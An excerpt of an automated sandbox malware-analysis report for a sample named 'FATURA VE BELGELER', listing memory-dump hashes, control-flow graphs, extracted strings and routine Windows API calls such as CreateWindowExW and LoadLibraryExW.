                                                              • Opcode ID: 46735f38794a315456e88fc38003fe9d569b513c5c24b9ca15e292ee7e347a39
                                                              • Instruction ID: c6bb6a9f24b96caf3b342d69e6c44a9b988c83bf2271b190339512cb653fb781
                                                              • Opcode Fuzzy Hash: 46735f38794a315456e88fc38003fe9d569b513c5c24b9ca15e292ee7e347a39
                                                              • Instruction Fuzzy Hash: 6E719471E016188FEB68CF6AD945B9EBBF2AF89300F14C1AAD40DA7254DB305A85CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: b139538b70cd2dc313796b437b726b51146df68eed13b3fb79e1f21ee8662b8a
                                                              • Instruction ID: 8915ac4ce956db9601105d5ccaf4b12afd5b69a6c4a3f56d07e0f4d456f3ab46
                                                              • Opcode Fuzzy Hash: b139538b70cd2dc313796b437b726b51146df68eed13b3fb79e1f21ee8662b8a
                                                              • Instruction Fuzzy Hash: F141F3B4D002088BEB58DFAAC9447DEFBF6BF89304F14C069D418AB294DB354A46CF65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 2504c61472a48401be5ea73713a79f319f7493a792af2cf2c2ada59154351bed
                                                              • Instruction ID: 1b1ddd11c93ef11587e91b7832456f4ce4fe487afc3d2775eda4071e0670f427
                                                              • Opcode Fuzzy Hash: 2504c61472a48401be5ea73713a79f319f7493a792af2cf2c2ada59154351bed
                                                              • Instruction Fuzzy Hash: F1416BB1D016188BEB58CF6BD94578AFBF7AFC9300F14C1AAD50CA6264DB740A86CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 51665fad77d20fecbea992ffdbe0df5d42b9d442abac01f3e28e85c2f5ebee22
                                                              • Instruction ID: 25b54052df75510d1defa1216731cef7e8045df772618f2f2c831f2d4459c870
                                                              • Opcode Fuzzy Hash: 51665fad77d20fecbea992ffdbe0df5d42b9d442abac01f3e28e85c2f5ebee22
                                                              • Instruction Fuzzy Hash: 06416AB1D016188FEB58CF6BC94578AFAF3AFC9310F14C1AAD50CA6265DB740A86CF51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 00a86732b34f8052e2c99a613983eea4bbb52d53cc22b4a3a9bf9e2d6a70933c
                                                              • Instruction ID: b189ca05ef55d57ab069c9c605bb0b00e500ef5fdc2b1f582f0152d355466f93
                                                              • Opcode Fuzzy Hash: 00a86732b34f8052e2c99a613983eea4bbb52d53cc22b4a3a9bf9e2d6a70933c
                                                              • Instruction Fuzzy Hash: 10416C71D016188BEB58CF67CD457CAFAF3AFC9300F14C0AAD50CA6254DB740A868F51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 4b0f2340a09cfdc12972c3e54257c85304b807041e11a77eda6021db55f72a40
                                                              • Instruction ID: 8e5c4f4171ff35d64982b8900953ccd4e511fa8070f8093a9f63697790a7e4d3
                                                              • Opcode Fuzzy Hash: 4b0f2340a09cfdc12972c3e54257c85304b807041e11a77eda6021db55f72a40
                                                              • Instruction Fuzzy Hash: 134169B1D016188BEB58CF6BDD45789FAF3AFC9300F04C1AAD50CA7264DB740A868F51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: f7481850b69d8eac8d23f5b30f9cd92723efc42c890293629c6c03670b1a777e
                                                              • Instruction ID: 53e6d26a2259d4d66a175170ebbdd10383e2111934781c33c875336ee2f723e6
                                                              • Opcode Fuzzy Hash: f7481850b69d8eac8d23f5b30f9cd92723efc42c890293629c6c03670b1a777e
                                                              • Instruction Fuzzy Hash: 41413BB1D016188BEB58CF6BDD5578AFAF3BFC9300F14C1AAD50CA6264DB740A868F51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: e2b8ac59b3b21b34c28bc9b0383c285aeaee46e71bef7fe53a208bbf76e74d8f
                                                              • Instruction ID: 8923416008802e4459d2647ec8527aa59bf8a4bd68fe826df88d6660aafd3437
                                                              • Opcode Fuzzy Hash: e2b8ac59b3b21b34c28bc9b0383c285aeaee46e71bef7fe53a208bbf76e74d8f
                                                              • Instruction Fuzzy Hash: CC4159B1E016188BEB58CF6BD94578AFAF3AFC9304F14C1AAD50CA6264DB740A858F51
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 527 2816eb8-2816eed 528 2816ef3-2816f16 527->528 529 281731c-2817320 527->529 538 2816fc4-2816fc8 528->538 539 2816f1c-2816f29 528->539 530 2817322-2817336 529->530 531 2817339-2817347 529->531 536 2817349-281735e 531->536 537 28173b8-28173cd 531->537 545 2817360-2817363 536->545 546 2817365-2817372 536->546 547 28173d4-28173e1 537->547 548 28173cf-28173d2 537->548 542 2817010-2817019 538->542 543 2816fca-2816fd8 538->543 552 2816f38 539->552 553 2816f2b-2816f36 539->553 549 281742f 542->549 550 281701f-2817029 542->550 543->542 559 2816fda-2816ff5 543->559 554 2817374-28173b5 545->554 546->554 555 28173e3-281741e 547->555 548->555 560 2817434-2817464 549->560 550->529 556 281702f-2817038 550->556 561 2816f3a-2816f3c 552->561 553->561 602 2817425-281742c 555->602 557 2817047-2817053 556->557 558 281703a-281703f 556->558 557->560 566 2817059-281705f 557->566 558->557 587 2817003 559->587 588 2816ff7-2817001 559->588 580 2817466-281747c 560->580 581 281747d-2817484 560->581 561->538 568 2816f42-2816fa4 561->568 569 2817065-2817075 566->569 570 2817306-281730a 566->570 615 2816fa6 568->615 616 2816faa-2816fc1 568->616 585 2817077-2817087 569->585 586 2817089-281708b 569->586 570->549 575 2817310-2817316 570->575 575->529 575->556 589 281708e-2817094 585->589 586->589 590 2817005-2817007 587->590 588->590 589->570 597 281709a-28170a9 589->597 590->542 598 2817009 590->598 599 2817157-2817182 call 2816d00 * 2 597->599 600 28170af 597->600 598->542 617 2817188-281718c 599->617 618 281726c-2817286 599->618 604 28170b2-28170c3 600->604 604->560 606 28170c9-28170db 604->606 606->560 607 28170e1-28170f9 606->607 671 28170fb call 2817488 607->671 672 28170fb call 2817498 607->672 611 2817101-2817111 611->570 614 2817117-281711a 611->614 619 2817124-2817127 614->619 620 281711c-2817122 614->620 615->616 616->538 617->570 621 2817192-2817196 617->621 618->529 638 281728c-2817290 618->638 619->549 622 281712d-2817130 619->622 620->619 620->622 625 2817198-28171a5 621->625 626 28171be-28171c4 621->626 627 2817132-2817136 622->627 628 2817138-281713b 622->628 641 28171b4 625->641 642 28171a7-28171b2 625->642 630 28171c6-28171ca 626->630 631 28171ff-2817205 626->631 627->628 629 2817141-2817145 627->629 628->549 628->629 629->549 636 281714b-2817151 629->636 630->631 637 28171cc-28171d5 630->637 633 2817211-2817217 631->633 634 2817207-281720b 631->634 639 2817223-2817225 633->639 640 2817219-281721d 633->640 634->602 634->633 636->599 636->604 643 28171e4-28171fa 637->643 644 28171d7-28171dc 637->644 645 2817292-281729c call 2815ba8 638->645 646 28172cc-28172d0 638->646 647 2817227-2817230 639->647 648 281725a-281725c 639->648 640->570 640->639 649 28171b6-28171b8 641->649 642->649 643->570 644->643 645->646 659 281729e-28172b3 645->659 646->602 652 28172d6-28172da 646->652 655 2817232-2817237 647->655 656 281723f-2817255 647->656 648->570 650 2817262-2817269 648->650 649->570 649->626 652->602 657 28172e0-28172ed 652->657 655->656 656->570 662 28172fc 657->662 663 28172ef-28172fa 657->663 659->646 668 28172b5-28172ca 659->668 665 28172fe-2817300 662->665 663->665 665->570 665->602 668->529 668->646 671->611 672->611
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (o]q$(o]q$(o]q$(o]q$(o]q$(o]q$,aq$,aq
                                                              • API String ID: 0-1435242062
                                                              • Opcode ID: 95fb737ada0c1220c5b85652fcf9444cf962cf80a639812228b086fdcbce9be5
                                                              • Instruction ID: 9aad13df58a421c8027e19e66d13e5324df60a74861cb36f4997484e57cf9eb7
                                                              • Opcode Fuzzy Hash: 95fb737ada0c1220c5b85652fcf9444cf962cf80a639812228b086fdcbce9be5
                                                              • Instruction Fuzzy Hash: 00124A38A00609CFCB15CF69D984A9EBBFAFF48314F548599E84ADB2A5D730ED41CB50
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 673 66b4b5a-66b4bf7 GetCurrentProcess 677 66b4bf9-66b4bff 673->677 678 66b4c00-66b4c34 GetCurrentThread 673->678 677->678 679 66b4c3d-66b4c71 GetCurrentProcess 678->679 680 66b4c36-66b4c3c 678->680 682 66b4c7a-66b4c92 679->682 683 66b4c73-66b4c79 679->683 680->679 694 66b4c95 call 66b4d48 682->694 695 66b4c95 call 66b4d38 682->695 683->682 686 66b4c9b-66b4cca GetCurrentThreadId 687 66b4ccc-66b4cd2 686->687 688 66b4cd3-66b4d35 686->688 687->688 694->686 695->686
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 066B4BE6
                                                              • GetCurrentThread.KERNEL32 ref: 066B4C23
                                                              • GetCurrentProcess.KERNEL32 ref: 066B4C60
                                                              • GetCurrentThreadId.KERNEL32 ref: 066B4CB9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID: 7#\
                                                              • API String ID: 2063062207-3014239955
                                                              • Opcode ID: cb0127626859bd9651d57060d72f15aedf0185176a078193be22d206e36a387a
                                                              • Instruction ID: c31a02c627c90feaf9819dff11513ce846e485787b589a00732fbc68e85d6351
                                                              • Opcode Fuzzy Hash: cb0127626859bd9651d57060d72f15aedf0185176a078193be22d206e36a387a
                                                              • Instruction Fuzzy Hash: 945144B0D012498FDB94DFA9D948BEEBFF1EF48304F208059E009A7361DB395984CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 696 66b4b68-66b4bf7 GetCurrentProcess 700 66b4bf9-66b4bff 696->700 701 66b4c00-66b4c34 GetCurrentThread 696->701 700->701 702 66b4c3d-66b4c71 GetCurrentProcess 701->702 703 66b4c36-66b4c3c 701->703 705 66b4c7a-66b4c92 702->705 706 66b4c73-66b4c79 702->706 703->702 717 66b4c95 call 66b4d48 705->717 718 66b4c95 call 66b4d38 705->718 706->705 709 66b4c9b-66b4cca GetCurrentThreadId 710 66b4ccc-66b4cd2 709->710 711 66b4cd3-66b4d35 709->711 710->711 717->709 718->709
                                                              APIs
                                                              • GetCurrentProcess.KERNEL32 ref: 066B4BE6
                                                              • GetCurrentThread.KERNEL32 ref: 066B4C23
                                                              • GetCurrentProcess.KERNEL32 ref: 066B4C60
                                                              • GetCurrentThreadId.KERNEL32 ref: 066B4CB9
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: Current$ProcessThread
                                                              • String ID: 7#\
                                                              • API String ID: 2063062207-3014239955
                                                              • Opcode ID: 4e86c520ae2132d0497e92d26a7397823e6149824cd877b3aa836bf2e37f92ae
                                                              • Instruction ID: 28c3d807437b1708364985f6e26abff0b61707fca412c133fe9a476ef1368c1e
                                                              • Opcode Fuzzy Hash: 4e86c520ae2132d0497e92d26a7397823e6149824cd877b3aa836bf2e37f92ae
                                                              • Instruction Fuzzy Hash: F65146B0D00249CFDB94DFAAD948BEEBBF1EF48304F208459E019A7361DB395984CB65
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 1324 66bf632-66bf639 1325 66bf63b-66bf63d 1324->1325 1326 66bf6aa 1324->1326 1327 66bf6ac-66bf6d9 1325->1327 1328 66bf63f-66bf643 1325->1328 1326->1327 1331 66bf6db-66bf6f8 1327->1331 1332 66bf74a-66bf767 1327->1332 1335 66bf76a-66bf7b6 1331->1335 1336 66bf6fb-66bf730 call 66bd84c 1331->1336 1332->1335 1337 66bf7b8-66bf7be 1335->1337 1338 66bf7c1-66bf7c8 1335->1338 1347 66bf735-66bf736 1336->1347 1337->1338 1339 66bf7ca-66bf7d0 1338->1339 1340 66bf7d3-66bf872 CreateWindowExW 1338->1340 1339->1340 1345 66bf87b-66bf8b3 1340->1345 1346 66bf874-66bf87a 1340->1346 1351 66bf8c0 1345->1351 1352 66bf8b5-66bf8b8 1345->1352 1346->1345 1353 66bf8c1 1351->1353 1352->1351 1353->1353
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 7#\$7#\
                                                              • API String ID: 0-3751469010
                                                              • Opcode ID: b573789a3def26e6fdabcf1f49e1439e3af5c1dd00295f01afac90d741767ed6
                                                              • Instruction ID: 9e01d774d94330edeb61373c0c3f1279663a293517eaef2f0bb0dc82d2eba538
                                                              • Opcode Fuzzy Hash: b573789a3def26e6fdabcf1f49e1439e3af5c1dd00295f01afac90d741767ed6
                                                              • Instruction Fuzzy Hash: 1C715871C05388EFCB12CFA9D8509CEBFB5BF4A300F14919AE414AB262C7719995CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 066BF862
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: CreateWindow
                                                              • String ID: 7#\$7#\
                                                              • API String ID: 716092398-3751469010
                                                              • Opcode ID: 0d8ef463d932179a94c7fe5b0f111765c21a8e98e48e0e73c873646807d69518
                                                              • Instruction ID: 60e49ad051015e3c9a618500377fd3efa520e09c26ad880647afaff1f98e9f71
                                                              • Opcode Fuzzy Hash: 0d8ef463d932179a94c7fe5b0f111765c21a8e98e48e0e73c873646807d69518
                                                              • Instruction Fuzzy Hash: 6D51C4B1D10309EFDB54CF9AC884ADDBBB5FF48310F24912AE418A7260D774A985CF90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 4']q$4']q$;]q
                                                              • API String ID: 0-1096896373
                                                              • Opcode ID: e0b1ee4ebf67c203f4d4043edc989bca4196ac20e72e217bd8215a9b059083de
                                                              • Instruction ID: 0ae116c0f58ff82c3f0546e3ed2dfab89965aff9da27d0fa8e0b417c29279d66
                                                              • Opcode Fuzzy Hash: e0b1ee4ebf67c203f4d4043edc989bca4196ac20e72e217bd8215a9b059083de
                                                              • Instruction Fuzzy Hash: F4F1A07C3052018FFB195B29C95AB39379EAF85748F1844AAE40ACF3E1EB29DC41C742
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID: 7#\
                                                              • API String ID: 4139908857-3014239955
                                                              • Opcode ID: c476cef8254ee050b23706997bf862843b30a491a015924a59e700678a8e2e28
                                                              • Instruction ID: 1d9e01689d4c2d49bcd089fa5731f89ba7e21c9d6c72049326b6eed4c8756924
                                                              • Opcode Fuzzy Hash: c476cef8254ee050b23706997bf862843b30a491a015924a59e700678a8e2e28
                                                              • Instruction Fuzzy Hash: 63712370A00B45CFD7A4DF69D45079ABBF5FF88200F048A2DD58A9BB50D734E946CB90
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,066B4D76,?,?,?,?,?), ref: 066B4E37
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID: 7#\
                                                              • API String ID: 3793708945-3014239955
                                                              • Opcode ID: 5012d0bfe68115cb93bb22000382f752fd0f8e341e2162ab7fc6e5818545c8ca
                                                              • Instruction ID: aae4bb0aeaed6fd81b68826d6af03851388ca758fbf6fca54794ee9821c73110
                                                              • Opcode Fuzzy Hash: 5012d0bfe68115cb93bb22000382f752fd0f8e341e2162ab7fc6e5818545c8ca
                                                              • Instruction Fuzzy Hash: 082105B5900248DFDB10CF9AD584AEEBBF8EB48310F10841AE918A3310C378A951CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,066B4D76,?,?,?,?,?), ref: 066B4E37
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: DuplicateHandle
                                                              • String ID: 7#\
                                                              • API String ID: 3793708945-3014239955
                                                              • Opcode ID: 0466f10a7678a9d66a935af8660cc0e792dcb2bc70c393e72acff3a792942e36
                                                              • Instruction ID: 3561245cc6bf1ef40d78117a62b8db8f483316ab2654c41b24dd5ea74f43c999
                                                              • Opcode Fuzzy Hash: 0466f10a7678a9d66a935af8660cc0e792dcb2bc70c393e72acff3a792942e36
                                                              • Instruction Fuzzy Hash: C521D2B59002489FDB10CFAAD984ADEBBF5FB48310F14841AE918A3310D378A945CFA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,066BD439,00000800,00000000,00000000), ref: 066BD62A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: 7#\
                                                              • API String ID: 1029625771-3014239955
                                                              • Opcode ID: 6bc376fad75bce11632e906c4bc483d34bd206b1ebc97dd0055fbce99455a2ad
                                                              • Instruction ID: 30c734a71271f6ef5454aceae8945d8b6f7b2f1211789a356713d790f2c8fa74
                                                              • Opcode Fuzzy Hash: 6bc376fad75bce11632e906c4bc483d34bd206b1ebc97dd0055fbce99455a2ad
                                                              • Instruction Fuzzy Hash: 261103B6D002089FCB10CFAAD444ADEFBF8EF48310F10842AE519A7210D379A685CFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,066BD439,00000800,00000000,00000000), ref: 066BD62A
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: LibraryLoad
                                                              • String ID: 7#\
                                                              • API String ID: 1029625771-3014239955
                                                              • Opcode ID: ede34aaf5993d0e57ecae42cb29428242c10669ffc573b5cce5db3eca040b5ed
                                                              • Instruction ID: 5dd8ce1d1127543eefe553f1a86e001f044621e1cd35927f3da73c44b5ad5c26
                                                              • Opcode Fuzzy Hash: ede34aaf5993d0e57ecae42cb29428242c10669ffc573b5cce5db3eca040b5ed
                                                              • Instruction Fuzzy Hash: E51114B6D00209CFDB10DF9AD444ADEFBF4EF48310F14842AE519A7200D379A545CFA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000,?,?,?,?,?,?,?,066BD184), ref: 066BD3BE
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446602054.00000000066B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 066B0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_66b0000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID: 7#\
                                                              • API String ID: 4139908857-3014239955
                                                              • Opcode ID: d213ef3747ca0c2d0b7b7e956893df2b7ef4fe4c48a8c8cf32d9fc627e944510
                                                              • Instruction ID: 10569ab6d4ae0146fcb0c1ed6b8f4f907298bf57553a633ad78bce7aa15229a4
                                                              • Opcode Fuzzy Hash: d213ef3747ca0c2d0b7b7e956893df2b7ef4fe4c48a8c8cf32d9fc627e944510
                                                              • Instruction Fuzzy Hash: 271132B5C00349CFCB50DF9AC444ADEFBF4EF89214F10942AD519A7200C378A985CFA0
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: $]q$$]q
                                                              • API String ID: 0-127220927
                                                              • Opcode ID: 55dd4423d69b5c422f8a1a57291424cdbe0249129004d8114370fb1f987358e7
                                                              • Instruction ID: 4a9a56fad49e07deea678a49c2253b8ce11df3ea72630246a3012d99556d54f7
                                                              • Opcode Fuzzy Hash: 55dd4423d69b5c422f8a1a57291424cdbe0249129004d8114370fb1f987358e7
                                                              • Instruction Fuzzy Hash: 17527678A0021CCFEB15DBA4C851B9EBB76EF84300F1081A9D10AA73A6DF355E45DFA5
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: Haq$Haq
                                                              • API String ID: 0-4016896955
                                                              • Opcode ID: c20587b5b49a0d6ce9332f965df239665133b00890c63e22ced6f60e3d13d78a
                                                              • Instruction ID: 38c1d982a63bbea99b3366c274fd2b5d6d31499d54efd231be5056c8e536f17f
                                                              • Opcode Fuzzy Hash: c20587b5b49a0d6ce9332f965df239665133b00890c63e22ced6f60e3d13d78a
                                                              • Instruction Fuzzy Hash: 1FB1BE3C7442548FDB159F28D494B6E7BAAAFC8314F448869E84ACB3D1DB78DC12CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: LR]q$LR]q
                                                              • API String ID: 0-3917262905
                                                              • Opcode ID: 8488fd52dc7d257d65bf06b77b3b9d8f89700fc684fbff26d6aa4cc4c53dbcec
                                                              • Instruction ID: a96a9706f0aaace79ecc43f2348a10c3d7ff8d533c41e01a6fc764c45ac0b3a6
                                                              • Opcode Fuzzy Hash: 8488fd52dc7d257d65bf06b77b3b9d8f89700fc684fbff26d6aa4cc4c53dbcec
                                                              • Instruction Fuzzy Hash: E581E535B201059FCB58DF79C46496E77BAFF88614B118569E406DB3B1DB30EE02CBA1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4443913621.0000000002810000.00000040.00000800.00020000.00000000.sdmp, Offset: 02810000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_2810000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: ,aq$,aq
                                                              • API String ID: 0-2990736959
                                                              • Opcode ID: 5b513f60e82f0395f135cd473b6c4ad06bb191b6de05e8dc76bd63608291b269
                                                              • Instruction ID: 8eef6888c85f79186ca9d653997ae5b16b157f2c63d3a29ed367b516af0995cd
                                                              • Opcode Fuzzy Hash: 5b513f60e82f0395f135cd473b6c4ad06bb191b6de05e8dc76bd63608291b269
                                                              • Instruction Fuzzy Hash: BB81A27CA00109CFCB14CF69C488A6AB7FAFFC8308B958169D419DB3A5D739E841CB91
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000003.00000002.4446522689.0000000006690000.00000040.00000800.00020000.00000000.sdmp, Offset: 06690000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_3_2_6690000_FATURA VE BELGELER.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: (&]q$(aq
                                                              • API String ID: 0-1602648543
                                                              • Opcode ID: c11c94a7042a635afead751ac32331ea3a75ef06aae3da7fa190436f3ed88764
                                                              • Instruction ID: f81ff6fad9748d6ab88092ad0b8dbb3e8e405c9fc9fadc8a4b92434a5500e56e
